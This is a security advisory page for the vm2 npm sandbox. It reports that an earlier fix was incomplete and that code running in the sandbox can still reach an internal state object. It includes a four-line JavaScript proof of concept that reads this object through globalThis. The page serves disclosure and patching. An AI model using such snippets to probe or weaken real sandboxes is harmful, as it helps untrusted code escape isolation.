MEDIUM 5.3 npm
vm2 has access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL`
GHSA-2cm2-m3w5-gp2f
Published ยท Modified
Description
Summary
https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7 is not fully patched.
Details
It is still possible to get access to VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL.
PoC
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
globalThis['VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL']
`));
Ready to move
Start Securing
Free, no credit card | First findings in minutes